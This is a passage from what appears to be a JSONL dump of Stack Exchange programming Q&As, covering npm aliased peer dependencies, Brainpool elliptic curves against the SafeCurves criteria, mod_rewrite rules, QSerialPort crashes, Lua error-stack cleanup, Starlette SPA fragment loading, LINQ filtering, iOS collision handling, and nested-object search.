node_modules\/react-dom-17\nnpm ERR! dev react-dom-17@\"npm:firstname.lastname@example.com\" from the root project\nnpm ERR! \nnpm ERR! Fix the upstream dependency conflict, or retry\nnpm ERR! this command with --force, or --legacy-peer-deps\nnpm ERR! to accept an incorrect (and potentially broken) dependency resolution.\n<\/code>\nHow can I make <code>npm install<\/code> work again and help it to resolve the packages by itself?\nAnswer: *I rewrote my comment as I did not get the problem at first\nIt is possible, but you will need to manually edit the package-lock file of NPM.\nIn steps as follows:\n\nLeave only the legacy dependencies in the package.json file like so:\n\n<code> {\n \"name\": \"npmpeerstest\",\n \"version\": \"1.0.0\",\n \"description\": \"\",\n \"type\": \"module\",\n \"main\": \"index.js\",\n \"scripts\": {\n \"test\": \"echo \\\"Error: no test specified\\\" && exit 1\"\n },\n \"author\": \"\",\n \"license\": \"ISC\",\n \"devDependencies\": {\n \"@legacy\/react\": \"npm:react@^17.0.2\",\n \"@legacy\/react-dom\": \"npm:react-dom@^17.0.2\"\n }\n }\n<\/code>\n\nRun npm install, it should pass ok\nEdit package-lock.json from this:\n\n<code>\"node_modules\/@legacy\/react-dom\": {\n \"name\": \"react-dom\",\n \"version\": \"17.0.2\",\n \"resolved\": \"https:\/\/registry.npmjs.org\/react-dom\/-\/react-dom-17.0.2.tgz\",\n \"integrity\": \"sha512-s4h96KtLDUQlsENhMn1ar8t2bEa+q\/YAtj8pPPdIjPDGBDIVNsrD9aXNWqspUe6AzKCIG0C1HZZLqLV7qpOBGA==\",\n \"dev\": true,\n \"dependencies\": {\n \"loose-envify\": \"^1.1.0\",\n \"object-assign\": \"^4.1.1\",\n \"scheduler\": \"^0.20.2\"\n },\n \"peerDependencies\": {\n \"react\": \"17.0.2\"\n }\n },\n<\/code>\nto:\n<code>\"node_modules\/@legacy\/react-dom\": {\n \"name\": \"react-dom\",\n \"version\": \"17.0.2\",\n \"resolved\": \"https:\/\/registry.npmjs.org\/react-dom\/-\/react-dom-17.0.2.tgz\",\n \"integrity\": \"sha512-s4h96KtLDUQlsENhMn1ar8t2bEa+q\/YAtj8pPPdIjPDGBDIVNsrD9aXNWqspUe6AzKCIG0C1HZZLqLV7qpOBGA==\",\n \"dev\": true,\n \"dependencies\": {\n \"loose-envify\": \"^1.1.0\",\n \"object-assign\": \"^4.1.1\",\n \"scheduler\": \"^0.20.2\"\n },\n \"peerDependencies\": {\n \"@legacy\/react\": \"17.0.2\"\n }\n 
},\n<\/code>\nNotice that we need to manually set the react dependency to use the @legacy\/react instead of react\n\nAdd new dependencies to package.json like so:\n\n<code>{\n \"name\": \"npmpeerstest\",\n \"version\": \"1.0.0\",\n \"description\": \"\",\n \"type\": \"module\",\n \"main\": \"index.js\",\n \"scripts\": {\n \"test\": \"echo \\\"Error: no test specified\\\" && exit 1\"\n },\n \"author\": \"\",\n \"license\": \"ISC\",\n \"devDependencies\": {\n \"@legacy\/react\": \"npm:react@^17.0.2\",\n \"@legacy\/react-dom\": \"npm:react-dom@^17.0.2\",\n \"react\": \"18.0.0\",\n \"react-dom\": \"18.0.0\"\n }\n}\n<\/code>\n\nRun npm install, and all should pass\n\n*do not forget to commit the package-lock.json with the modification or other installs will fail\nComment: Thank you for your answer. It should work, but I should not edit `package-lock.json` by hand.\nComment: Well, then I see one option: to republish react in a private npm registry (or just a private package in npm) with a prefux, and then republish react-dom with a modified dependency to your republished react instead of the real react again with a prefix.\n","meta":{"source":"stackoverflow","title":"Resolve peer dependency of aliased package breaks npm install","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is either brainpoolP320r1 or brainpoolP320t1 a SafeCurve?\n\nQuestion: Not all elliptic curves are safe to use for cryptography, especially from an ECC safety perspective. The site http:\/\/safecurves.cr.yp.to\/index.html shows that two tested Brainpool curves, brainpoolP256t1 and brainpoolP384t1, are not ECC security safe even though they are ECDLP safe. Not all the Brainpool curves were evaluated however.\nI am curious if the 320-bit curves brainpoolP320r1 and brainpoolP320t1 pass these safety tests. These curves are defined in RFC5639.\nI see the Sage verification script is provided, http:\/\/safecurves.cr.yp.to\/verify.html. It requires many parameters to set it up for testing these curves, such as a list of all the prime divisors of q-1 for each q in the list. 
I'm not sure how to correctly do this.\nHas any crypto experts or enthusiast verified 320-bit curves or is there an easier way to to perform the testing (such a a program that does not require so much complex setup)?\nAlternatively could some help explain how to correctly setup the parameters for the Sage script to test these curves (or any curves in general).\nThe instructions are:\nEach directory contains the following files:\n<code>p: the field prime, in decimal.\nl: the prime order of the base point, in decimal.\nx1: the x-coordinate of the base point.\ny1: the y-coordinate of the base point.\nx0: the x-coordinate of a point generating the entire curve.\ny0: the y-coordinate of a point generating the entire curve.\nshape: the curve shape, either shortw or montgomery or edwards.\na and b, if the curve shape is shortw: the coefficients in the short Weierstrass equation.\nA and B, if the curve shape is montgomery: the coefficients in the Montgomery equation.\nd, if the curve shape is edwards: the coefficient in the Edwards equation.\nprimes: all prime divisors of of p, the curve order p+1-t, the twist order p+1+t, and t^2-4p; and, recursively, all prime divisors of q-1 for each q in the list.\n<\/code>\nAnd the curves are defined as: -\nCurve-ID: brainpoolP320r1\n<code> p = D35E472036BC4FB7E13C785ED201E065F98FCFA6F6F40DEF4F92B9EC7893EC\n 28FCD412B1F1B32E27\n\n A = 3EE30B568FBAB0F883CCEBD46D3F3BB8A2A73513F5EB79DA66190EB085FFA9\n F492F375A97D860EB4\n\n B = 520883949DFDBC42D3AD198640688A6FE13F41349554B49ACC31DCCD884539\n 816F5EB4AC8FB1F1A6\n\n x = 43BD7E9AFB53D8B85289BCC48EE5BFE6F20137D10A087EB6E7871E2A10A599\n C710AF8D0D39E20611\n\n y = 14FDD05545EC1CC8AB4093247F77275E0743FFED117182EAA9C77877AAAC6A\n C7D35245D1692E8EE1\n\n q = D35E472036BC4FB7E13C785ED201E065F98FCFA5B68F12A32D482EC7EE8658\n E98691555B44C59311\n\n h = 1\n<\/code>\nCurve-ID: brainpoolP320t1 #Twisted curve\n<code> Z = 15F75CAF668077F7E85B42EB01F0A81FF56ECD6191D55CB82B7D861458A18F\n EFC3E5AB7496F3C7B1\n\n A = D35E472036BC4FB7E13C785ED201E065F98FCFA6F6F40DEF4F92B9EC7893EC\n 28FCD412B1F1B32E24\n\n B = A7F561E038EB1ED560B3D147DB782013064C19F27ED27C6780AAF77FB8A547\n CEB5B4FEF422340353\n\n x = 925BE9FB01AFC6FB4D3E7D4990010F813408AB106C4F09CB7EE07868CC136F\n FF3357F624A21BED52\n\n y = 63BA3A7A27483EBF6671DBEF7ABB30EBEE084E58A0B077AD42A5A0989D1EE7\n 1B1B9BC0455FB0D2C3\n\n q = D35E472036BC4FB7E13C785ED201E065F98FCFA5B68F12A32D482EC7EE8658\n E98691555B44C59311\n\n h = 1\n<\/code>\nWhere:\n<code> p is the prime specifying the base field.\n\n A and B are the coefficients of the equation y^2 = x^3 + A*x + B\n mod p defining the elliptic curve.\n\n G = (x,y) is the base point, i.e., a point in E of prime order,\n with x and y being its x- and y-coordinates, respectively.\n\n q is the prime order of the group generated by G.\n\n h is the cofactor of G in E, i.e., #E(GF(p))\/q.\n\n For the twisted curve, we also give the coefficient Z that defines\n the isomorphism F (see requirement 3 in Section 2.2).\n<\/code>\nSo for verify.sage (LHS is files for verify sage, RHS is from RFC):\n<code> p = int(p)\n l = int(q) # I think, IIUC\n x1 = int(x)\n y1 = int(y)\n x0 = ???\n y0 = ???\n shape = ?? # for brainpoolP320r1 either \"shortw\" or \"montgomery\"? For brainpoolP320t1 \"edwards\"?\n a = A\n b = B\n A = A\n B = B\n d = int(Z) # for brainpoolP320t1 only\n primes = ???\n<\/code>\nNote: where I say int(x) it's to convert for hexadecimal representation to decimal. 
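For that conversion step I assume plain integer parsing is all that is meant, roughly as below (only my guess at the mapping; I still do not know how to produce x0, y0 or the recursive prime factorisations for the primes file):\n<code># strip the whitespace the RFC uses to wrap the hex, then parse base 16\ndef to_decimal(rfc_hex):\n    return str(int(''.join(rfc_hex.split()), 16))\n\n# e.g. the field prime of brainpoolP320r1, written to the file named p\nwith open('p', 'w') as f:\n    f.write(to_decimal('D35E472036BC4FB7E13C785ED201E065F98FCFA6F6F40DEF4F92B9EC7893EC'\n                       '28FCD412B1F1B32E27'))\n# q maps to l, A to a, B to b, x to x1, y to y1; and since both curves are\n# given as y^2 = x^3 + A*x + B, I assume the shape is simply 'shortw'\nwith open('shape', 'w') as f:\n    f.write('shortw')\n<\/code>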
The result is what would be saved in the text file for verify.sage to use.\nI'm afraid I understand ECC, EC, and maths too little to be able to do this.\nI will be grateful if someone would kindly help me. \n\nEdit: I think, because this question was migrated, it does not show up in my profile as a question I asked, even though I can edit the question. I also cannot accept the answer below that clearly states neither are safe curves. If possible can a mod either permit me to accept the answer or accept it on my behalf?\nComment: There's enough of an \"applied security\" aspect to it that this question also fits here.\nAnswer: A curve with cofactor 1, like all Brainpool curves, cannot possibly satisfy the SafeCurves criteria, so the answer to your question is no.\nWhether that means that they are actually \"unsafe\" for use in practice is debatable. I think it would be fair to say that implementing such curves in a secure way is perfectly doable in practice, but it's trickier to do so than with one of the SafeCurves, and performance will suffer as a result.\nComment: The generation of the parameters is not fully according to SafeCurve standards either. It's considered better than the (completely unspecified) method that NIST \/ Certicom curves have used to generate the curves, but it cannot be verified that there was no attempt to steer the values one way or another - it's just *likely* that they haven't been tampered with.\n","meta":{"source":"crypto.stackexchange","title":"Is either brainpoolP320r1 or brainpoolP320t1 a SafeCurve?","dup_signals":{}},"subset":"stackexchange"} +{"text":"mod_rewrite if file in subdirectory does not exist\n\nQuestion: i have never used <code>mod_rewrite<\/code> before, so I am struggling with setting up a proper rules for my use case.\nI have a URL looking like that: <code>domain.com\/pict\/123456<\/code>\ndirectory structure is like so:\n<code>\/pict\/\n |-- autogenerated\/\n |-- 12345.png\n |-- 87654.png\n |-- gen.php\n |-- .htaccess<\/code>\nand what I'd like to achieve is:\nIf <code>12345.png<\/code> does not exist in <code>autogenerated<\/code>, \nrewrite URL to <code>gen.php?id=12345<\/code>\nelse serve the <code>autogenerated\/12345.png<\/code> file\nI have tried various solutions found on the internet (as well as most of Stackoverflow answers - all to no avail).\nmy <code>.htaccess<\/code> file looks like so:\n<code><IfModule mod_rewrite.c>\n\nRewriteEngine On\n\nRewriteCond autogenerated\/%{REQUEST_FILENAME}.png -f\nRewriteRule ^(.+)$ autogenerated\/$1.png [L]\n\nRewriteRule ^(.*)$ generate.php?id=$1 [QSA,L]\n\n<\/IfModule>\n<\/code>\nI have also tried changing the <code>RewriteCond<\/code> like so:\n<code>RewriteCond autogenerated\/$1.png -f<\/code>\n<code>RewriteCond autogenerated\/%{REQUEST_URI}.png -f<\/code>\n<code>RewriteCond %{DOCUMENT_ROOT}\/autogenerated\/%{REQUEST_FILENAME}.png -f<\/code>\n<code>RewriteCond %{DOCUMENT_ROOT}\/autogenerated\/$1.png -f<\/code>\n<code>RewriteCond %{DOCUMENT_ROOT}\/pict\/autogenerated\/%{REQUEST_FILENAME}.png -f<\/code>\n<code>RewriteCond %{DOCUMENT_ROOT}\/pict\/autogenerated\/$1.png -f<\/code>\nand no matter what I do, first RewriteRule never triggers, and everything is sent to the <code>gen.php<\/code>\nam I missing anything here?\nComment: Both REQUEST_FILENAME and REQUEST_URI contain the path information. \/\/ Where is your htaccess file located, in the root or the pict folder?\nComment: oh. 
I thought that REQUEST_FILENAME contains only what's after last \"\/\"\n\nmy `htaccess` file is inside \"pict\" folder\nAnswer: You can use rules like this inside <code>pict\/.htaccess<\/code>:\n<code>RewriteEngine On\nRewriteBase \/pict\/\n\n# if image file exists inside pict\/autogenerated\/ \nRewriteCond %{DOCUMENT_ROOT}\/pict\/autogenerated\/$1.png -f\nRewriteRule ^(.+)$ autogenerated\/$1.png [L]\n\n# else rewrite to generate.php\nRewriteCond %{REQUEST_FILENAME} !-f\nRewriteCond %{REQUEST_FILENAME} !-d\nRewriteRule ^(.+)$ generate.php?id=$1 [QSA,L]\n<\/code>\nComment: you're a star! thanks a lot :)\nstill don't get why it didn't work for me and setting `RewriteBase` did make it work, tough... o_O\n","meta":{"source":"stackoverflow","title":"mod_rewrite if file in subdirectory does not exist","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it a problem to turn off power to a running QSerialPort?\n\nQuestion: I'm developing an application with several serial ports. Each of these ports is handled by a different thread and has its own <code>QSerialPort<\/code> object. From a hardware point of view, they are connected hierarchicaly, meaning that there is one main device connected to the PC with a usb cable (1 COM port), to this main device there are several other devices connected, each of them having its own COM port. The main device can turn on\/off the power supply to these child ports.\nIn the application, the ports are handled asynchronously. Each device object is running in its own loop. If its port is opened, it reads the incoming data. If the port is closed, it tries to open it in every loop until it succeeds. Each <code>QSerialPort<\/code> object handles errors on the <code>errorOccurred<\/code> signal. If it receives <code>DeviceNotFoundError<\/code>, <code>PermissionError<\/code>, <code>ResourceError<\/code> error, the port is closed (if it was opened) and the looping continues as described above.\nThe problem is that this serial communication part of the application is crashing (segmentation fault). I spent days finding the issue but with no results so far. To better understand what is going on, I wanted to ask here. Could it be a problem for <code>QSerialPort<\/code> if the main device turns off the power supply for the child ports while they're opened and are working? Or if the power supply is turned off while the child ports are being opened\/closed or any other operation is being executed on them? (I don't want to include the specific executable code as it's a part of a bigger application and would be hard to make and executable from it. I'd like to discuss just the concepts described above if possible.)\nThanks for any help or ideas!\nUPDATE\nCreating of <code>QSerialPort<\/code> and putting it into a different thread:\n<code>QThread *t = new QThread(this)\nSomeObject *o = new SomeObject(this);\n\no->moveToThread(t);\nt->start();\n<\/code>\nLater in the <code>SomeObject<\/code>:\n<code>QSerialPort *port = new QSerialPort();\n<\/code>\nComment: Could you add your code where the segmentation fault occurs please?\nComment: @ElevenJune I don't know where it occurs. 
That's why I'm speaking just abstractly with no code example.\nComment: Could you show the part where you create the QSerialPort and put them into different threads ?\nComment: @ElevenJune Updated the question.\nComment: Are your SomeObject* and QSerialPort* in the same thread ?\nThis is my code : \n `m_serialPort = new QSerialPort();\n m_serialPortThread = new QThread();\n\n m_serialPort->moveToThread(m_serialPortThread);\n moveToThread(m_serialPortThread);\n m_serialPortThread->start();`\nMy SomeObject* creates the QThread and moves itself in it with its QSerialPort.\nComment: The whole routine is following: SomeObject has its own thread and QSerialPort pointer. Then there is AnotherObject from another thread, which accesses SomeObject's pointer, creates and opens the QSerialPort object. Then only AnotherObject works with the port, so the port is created and handled by the same thread. This implementation had its reasons and it's not standard. It works fine, but sometimes it accidentaly crashes in some part of serial communication.\nComment: @T.Poe, did you ever figure out a solution to this? I have the same problem, if the serial port I have open looses power or is disconnected, I get a segmentation fault, even if I try to close the port as soon as it's detected. I would appreciate it if you could share your solution (if you found one yet). Thanks!\nComment: @Brent I'm not sure if we solved the issue or it just stopped happening. Here is a thread I started on qt forum, maybe something of that helps you: https:\/\/forum.qt.io\/topic\/94878\/turning-off-power-to-a-running-qserialport\nAnswer: Try to destroy port object before power off, and recreate it after power on\n<code>QSerialPort *port = new QSerialPort();\n\/\/init and use\n\/\/....\ndelete port;\nport = nullptr;\n\/\/turn the power off\n\n\/\/turn the power on\nport = new QSerialPort();\n<\/code>\nComment: The problem is, that switching on and off the ports is asynchronous. I don't know when it happens, so I cannot destroy the object.\n","meta":{"source":"stackoverflow","title":"Is it a problem to turn off power to a running QSerialPort?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Lua: How to properly clean up errors returned by lua_pcall\n\nQuestion: I've been having a crash problem with Lua for a little while now, and I finally discovered what I believe to be the problem. I'm allowing the script to omit functions that are attempted to be called for convenience. I want my application to attempt to invoke TestFun (as an example), and if it exists then execute it, otherwise gracefully and silently fail.\nThe problem I was having was that I simply invoked lua_pcall(L, 0, 0, 0) and ignored the return value because it didn't matter to me. What I discovered was that when Lua generates the error \"attempt to call nil\" it places this on its stack and I was not popping this off. The code below exhibits a crash shortly after being run due to the stacksize growing too large:\n<code>int _tmain(int argc, _TCHAR* argv[])\n{\n std::string script = \"\";\n lua_State* L = luaL_newstate();\n luaL_openlibs(L);\n luaL_loadstring(L, script.c_str());\n lua_pcall(L, 0, LUA_MULTRET, 0);\n\n while (true)\n {\n lua_getglobal(L, \"TestFunc\");\n lua_pcall(L, 0, 0, 0);\n }\n\n return 0;\n}\n<\/code>\nI simply modified my code inside the while loop to be:\n<code>while (true)\n{\n lua_getglobal(L, \"TestFunc\");\n if (lua_pcall(L, 0, 0, 0))\n lua_pop(L, -1);\n}\n<\/code>\nAnd this solved my crash. 
My question is whether or not this is valid in all cases of lua_pcall() error results, or if I'm setting myself up for another bug\/crash by not specifically checking if I should pop -1 (or possibly others?). Perhaps I should only pop if -1 is a string, or perhaps there's a standard 'cleanup the stack' function I could call?\nThanks\nComment: It depends whether your error handler function adds any items to the stack. You could always (in the debug build) use `lua_gettop` before and after `lua_pcall` to check, if stack size is ok.\nAnswer: Your modified code is fine except that you need to pop 1, not -1.\n","meta":{"source":"stackoverflow","title":"Lua: How to properly clean up errors returned by lua_pcall","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to design navigation for a Starlette SPA\n\nQuestion: I want to create a light-weight-SPA.\nI thought of passing in a path param (<code>nav_element<\/code>), which also corresponds to the resource. The Jinja2 engine can then simply access the value by {{nav_element}}.\n<code>async def dashboard(request: Request):\n \"\"\"For this page you must be authenticated.\"\"\" \n await request.send_push_promise(\"\/static\/styles.css\")\n\n try:\n nav_element = request.path_params['nav_element']\n except KeyError as ex:\n nav_element = None\n logger.info(nav_element)\n\n return templates.TemplateResponse('dashboard.html', {'request': request, \"nav_element\": nav_element})\n\nroutes = [\n Route('\/', endpoint=dashboard, methods=[\"GET\"]),\n Route('\/{nav_element:str}', endpoint=dashboard, methods=[\"GET\"]),\n Mount(path=\"\/static\", app=StaticFiles(directory=\"static\"), name=\"static\")\n]\n\nwebapp = Starlette(routes=routes )\n<\/code>\n(there is one thing I don't like with this approach, it requires 2 routes. anyhow.)\nSo, but how do I load the page elements?\n\nJavaScript I could do. But what is the best practice with Jinja2\/Starlette to load only specific elements of the page after clicking them in the navigation?\nAre there Jinja2\/Starlette elements that could help me rendering\/loading page elements\/fractions\/webcomponets for the SPA? I know {% include a_page.html %}. But that would not be how we load a SPA, right?!\nI really want to avoid to load entire pages.\n\nAny design experience is highly welcome.\nComment: I think StreamingResponse is what you need, I'll give a try and add an answer.\nAnswer: I did not have a sample to try, but can you try this?\n<code>async def dashboard(request: Request):\n \"\"\"For this page you must be authenticated.\"\"\"\n async def streamer():\n try:\n nav_element = request.path_params['nav_element']\n\n except KeyError as ex:\n nav_element = None\n yield templates.TemplateResponse('dashboard.html', {'request': request, \"nav_element\": nav_element}).body\n\n return StreamingResponse(streamer(), media_type=\"text\/html\")\n<\/code>\nComment: That is an interesting idea with the open stream. I'll test it ...\nAnswer: I must say any other solution than loading widgets for an Starlette-SPA by Javascript becomes utterly complex. There is one reason, when you load a HTML-template and you use the jinja2 include statements, it will NOT invoke the endpoint that is associated with it in Starlette. Thus, the data, which needs to be fetch for displaying in the widget (processed in the HTTPEndpoint), is never invoked. Makes sense in a way.\nSo the only way I found is to send another http request after the page has been loaded. 
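On the server side that only needs one extra fragment route; a rough sketch (the <code>widgets\/<\/code> template folder, the whitelist and the exact path are my own assumptions about how the app is mounted):\n<code>from starlette.responses import PlainTextResponse\n\nALLOWED_WIDGETS = {'test'}\n\nasync def widget(request: Request):\n    name = request.path_params['name']\n    if name not in ALLOWED_WIDGETS:  # never render arbitrary template names\n        return PlainTextResponse('unknown widget', status_code=404)\n    # render only the fragment, without the surrounding page layout\n    return templates.TemplateResponse(f'widgets\/{name}.html', {'request': request})\n\nwidget_route = Route('\/dashboard\/widgets\/{name}', endpoint=widget, methods=['GET'])\n# add widget_route to the routes list before any catch-all like '\/{nav_element:str}'\n<\/code>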
I think that is the cleanest\/shortest way to go for widgets (which have no SEO-requirements) not trying to work against Starlette's concept.\n<code>main = document.querySelector(\"#main_content > .title\");\nfetch(\"\/dashboard\/widgets\/test\")\n .then(response => response.text())\n .then(data => main.insertAdjacentHTML(\"afterend\", data));\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to design navigation for a Starlette SPA","dup_signals":{}},"subset":"stackexchange"} +{"text":"Distinct LINQ Statement - Select Group where Entity doesn't exist\n\nQuestion: I currently have a LINQ statement that returns an IQueryable to be displayed into a Telerik RadGrid. This statement is set to pull Records that match the Period inputted, and also have the \"Premium\" Column set to true. It then selects the EmployeeID & ProjectID distinctly using the GroupBy property.\nThese columns are then displayed in the RadGrid, along with a \"PremiumCode\" column. \nCurrently my statement works to display ALL of the records that meet the top credentials (Employee Name, Project, Premium Code), but my end Goal is to pull only those Records which DONT already have a \"PremiumCode\" assigned to the Project for that particular Employee.\n<code>public static IQueryable GetEmptyPremiums(string Period)\n {\n DataContext Data = new DataContext();\n var PR = (from c in Data.System_Times\n where c.Period == Period && c.Premium == true\n orderby c.System_Employee.LName\n select c).GroupBy(s => s.EmployeeID & s.ProjectID).Select(x => x.FirstOrDefault());\n\n return PR;\n }\n<\/code>\nCurrently it is displaying properly, but every record is being displayed, not just the ones that require a PremiumCode.\n\nIs there a way to re-work my LINQ statement to only include the records that need a PremiumCode?\nEDIT:\nJay,\nI have tried to modify your solution to fit my needs, but unfortunately with no success. Records in the Premium table are not added until a Premium Code is defined, therefore there will never be a null \"PremiumCode\". \nTo describe my end-goal a tad more clearly: I am looking to show the information in a grid like in the image above. The records shown will be the distinct Time records that have the bool value \"Premium\" checked as true but don't have a PremiumCode record in the Premium Table. \nIf the checked record has a matching record in the Premium table (EmployeeID, and ProjectID matching) then it already possesses a Premium Code set and will not need to be displayed in the Grid. \nIf the checked record has no matching record in the Premium table (EmployeeID, and ProjectID not matching) then it requires a PremiumCode and will need to be displayed in the Grid.\nI believe this can be achieved with \".Any()\" but I am having troubles aligning my Syntax and Logic to make this Grid display properly.\nComment: You haven't mentioned how the premium code is represented within the database or your model.\nComment: where c.Period == Period && c.Premium == true && !c.PremiumCode.HasValue -- is something like that what you are seeking?\nComment: The PremiumCode is located in it's own Table consisting of EmployeeID, ProjectID, PremiumCode, and a PremiumID. These are linked to an Employees Table, and Projects Table, respectively. 
Andrew - that is along the lines of what I am looking for but I with no Relationships between my Times and Premium Table, I cannot simply use c.PremiumCode, and c.System_Premium.PremiumCode gives me errors with IntelliSense.\nComment: Lando, I added an update in response to the edit.\nAnswer: How about:\n<code> DataContext Data = new DataContext();\n var projectsWithoutPremium = Data.Premiums.Where(p => p.PremiumCode == null)\n .Select(p => p.ProjectId);\n var PR = (from c in Data.System_Times\n where c.Period == Period && c.Premium == true\n && projectsWithoutPremium.Contains(c.ProjectId)\n orderby c.System_Employee.LName\n select c).GroupBy(s => s.EmployeeID & s.ProjectID).Select(x => x.FirstOrDefault());\n\n return PR;\n<\/code>\nupdate in response to question edit\n<code>DataContext Data = new DataContext();\nvar PR = (from c in Data.System_Times\n where c.Period == Period && c.Premium == true\n && !Data.Premiums.Any(p => p.ProjectID == c.ProjectID && p.EmployeeID == c.ProjectID) \n orderby c.System_Employee.LName select c)\n .GroupBy(s => s.EmployeeID & s.ProjectID)\n .Select(x => x.FirstOrDefault());\n\nreturn PR;\n<\/code>\nComment: This worked perfect! Hadn't thought of nesting a second LINQ statement, Thanks again!\nAnswer: If premium code is a string, you might want to try adding something like <code>.Where(x => string.isNullOrEmpty(x.PremiumCode))<\/code> before the GroupBy clause.\nComment: Logically this would work (and wish it did), but since there is no link directly from my \"Times\" table to my \"Premium\" table, I cannot simply use x.PremiumCode, or x.System_Premium.PremiumCode. I have my DB setup this way so that Each Employee, can have a different PremiumCode for each Job, not each record in the Times table.\n","meta":{"source":"stackoverflow","title":"Distinct LINQ Statement - Select Group where Entity doesn't exist","dup_signals":{}},"subset":"stackexchange"} +{"text":"Error colliding Images method in Xcode\/iOS\n\nQuestion: I am creating an iOS app with Xcode 6.1 using Objective C\nI am trying to create code to stop a moving object (Character) when hits another object. I have tried to do this using two methods but the object seem to be stopping at a different point to what I have set it to. Below are the two methods I have tried. I have also put links to the full version of the code on dropbox (links below).\nMethod 1: When the object reaches a particular co-ordinate.\n<code>\/\/Right Wall\nif(Character.center.x>295){\n [CharacterMovingTimer invalidate];\n}\n\/\/Left Wall\nif(Character.center.x<30){\n [CharacterMovingTimer invalidate];\n}\n\/\/Top Wall\nif(Character.center.y<30){\n [CharacterMovingTimer invalidate];\n}\n\/\/Bottom Wall\nif(Character.center.y>587){\n [CharacterMovingTimer invalidate];\n}\n<\/code>\nMethod 2: When the object intersect with the second object\n<code>if(CGRectIntersectsRect(Character.frame, RightWall.frame)){\n [CharacterMovingTimer invalidate];\n }\n if(CGRectIntersectsRect(Character.frame, LeftWall.frame)){\n [CharacterMovingTimer invalidate];\n }\n if(CGRectIntersectsRect(Character.frame, TopWall.frame)){\n [CharacterMovingTimer invalidate];\n }\n if(CGRectIntersectsRect(Character.frame, BottomWall.frame)){\n [CharacterMovingTimer invalidate];\n }\n<\/code>\nViewController.h\nhttps:\/\/www.dropbox.com\/s\/56j7rokp4il5eul\/ViewController_h.rtf?dl=0\nViewController.m\nhttps:\/\/www.dropbox.com\/s\/faqqbsnqb8o4se7\/ViewController_m.rtf?dl=0\nComment: What speed is the character moving? 
If you want the character to stop at 295 you would need to set their position after stopping the timer. If the character is moving at 40 pixels per timer tick the stop position could range between 295 and 335.\nComment: The character is moving at 30 pixels every 0.3 seconds.\nComment: And how far is the character off from where you expect him to be when you have a collision?\nComment: Sorry the issue is that when the character gets close to the wall it stops at a point that is not that actual co-ordinate i have set it to.. please take a look at this image, you can see the point at which the character stops is after it has gone through the object.\n\nhttps:\/\/www.dropbox.com\/s\/0vcebj725y6qpw5\/Main_storyboard2.png?dl=0\n\nit was set to stop once they touch, when i try to change the co-ordinates slightly it never allows the character to stop at that exact point.\nComment: Ok, so back to my original comment, I will now use that as an answer.\nAnswer: If you want the character to stop at 295 you would need to set their position after stopping the timer. If the character is moving at 40 pixels per timer tick the stop position could range between 295 and 335.\nUsing your first code as an example:\n<code>if(Character.center.x>295){\n Character.center = CGPointMake(295, Character.center.y);\n [CharacterMovingTimer invalidate];\n}\n\/\/Left Wall\nif(Character.center.x<30){\n Character.center = CGPointMake(30, Character.center.y);\n [CharacterMovingTimer invalidate];\n}\n\/\/Top Wall\nif(Character.center.y<30){\n Character.center = CGPointMake(Character.center.x, 30);\n [CharacterMovingTimer invalidate];\n}\n\/\/Bottom Wall\nif(Character.center.y>587){\n Character.center = CGPointMake(Character.center.x, 587);\n [CharacterMovingTimer invalidate];\n}\n<\/code>\nComment: Thank you for you answer, but this is still not working the same issue is occurring, the collision is identified either before or after the objects actually collide. Could it be something related to my settings rather than my code?\nComment: Could you post a new screen shot of what's happening now please?\nComment: And, given the iPhone 6 screen width of 375, what makes you think that the square is not at 295?\nComment: When I increase the co-ordinate number to 300, it stops at the same point. Even when the number is 305, it still stops at the exact same point.\nComment: Log out the x when it stops. I am guessing your statement will be incorrect and that you are just not noticing the 5 or 10 pixel change.\nComment: Slight movement with objects usually noticeable. But in this case I can see the object is in the same place until I increase the figure by 50 pixels, then it makes a dramatic jump. So there is no in between.\nComment: I would imagine that the number is 30 pixels as that's what you're moving by. You do change BOTH the check AND the assignment yes? I would instead move by 10 pixels every 0.1 if you're going to do it that way, it allows better control\nComment: I have tried that but no change. I have uploaded the code to dropbox, give it a go if you have a chance you'll understand.\nComment: Is there a link the to the project? The old links just link to old code with none of the changes mentioned here.\nComment: I have not saved any of these changes as they have not made a difference to the problem. I would like others to be able to alter the initial code to find a solution.\nComment: How about building the screen, the map, the walls. 
I'm prepared to look at your issue, not rebuild the project off of 1 view controller\nComment: I didn't realise the project link was not available \nhttps:\/\/www.dropbox.com\/s\/w5fmht5dinz5wfj\/ObjectMovement.zip?dl=0\nComment: I have downloaded and looked and everything is working as it should be. I changed the value from 295 to 300 and the block stopped 5 pixels further than it did previously. Be sure to change both values: `if(Character.center.x>305){\n Character.center = CGPointMake(305, Character.center.y);` Log out the positions and you will see\n","meta":{"source":"stackoverflow","title":"Error colliding Images method in Xcode\/iOS","dup_signals":{}},"subset":"stackexchange"} +{"text":"Search nested object and return whole path\n\nQuestion: I have below JavaScript with n level children and want to search for id and if any of item from has matching id than need to return object from root to matching item.\nI want to return entire hierarchy of found item from root till object with it's children.\nI tried with lodash and underscore and could not find easy solution.\n<code>input: {\n \"children\": [{\n \"name\": \"Home\",\n \"title\": \"Home\",\n \"id\": \"home1\",\n \"children\": []\n },\n {\n \"name\": \"BUSINESS AND ROLE SPECIFIC\",\n \"title\": \"BUSINESS AND ROLE SPECIFIC\",\n \"id\": \"BAR1\",\n \"children\": [{\n \"name\": \"Global Businesses\",\n \"title\": \"Global Businesses\",\n \"id\": \"GB1\",\n \"children\": [{\n \"name\": \"Commercial Banking\",\n \"title\": \"Commercial Banking\",\n \"id\": \"CB1\",\n \"children\": [{\n \"name\": \"FLAGSHIP PROGRAMMES\",\n \"title\": \"FLAGSHIP PROGRAMMES\",\n \"id\": \"FG1\",\n \"children\": []\n }]\n }]\n }]\n },\n {\n \"name\": \"RISK MANAGEMENT\",\n \"title\": \"RISK MANAGEMENT\",\n \"id\": \"RM1\",\n \"children\": []\n }\n ]\n}\n\nSearch: {\n id: 'FG1'\n}\n\nreturn :{\n \"name\": \"BUSINESS AND ROLE SPECIFIC\",\n \"title\": \"BUSINESS AND ROLE SPECIFIC\",\n \"id\": \"BAR1\",\n \"children\": [{\n \"name\": \"Global Businesses\",\n \"title\": \"Global Businesses\",\n \"id\": \"GB1\",\n \"children\": [{\n \"name\": \"Commercial Banking\",\n \"title\": \"Commercial Banking\",\n \"id\": \"CB1\",\n \"children\": [{\n \"name\": \"FLAGSHIP PROGRAMMES\",\n \"title\": \"FLAGSHIP PROGRAMMES\",\n 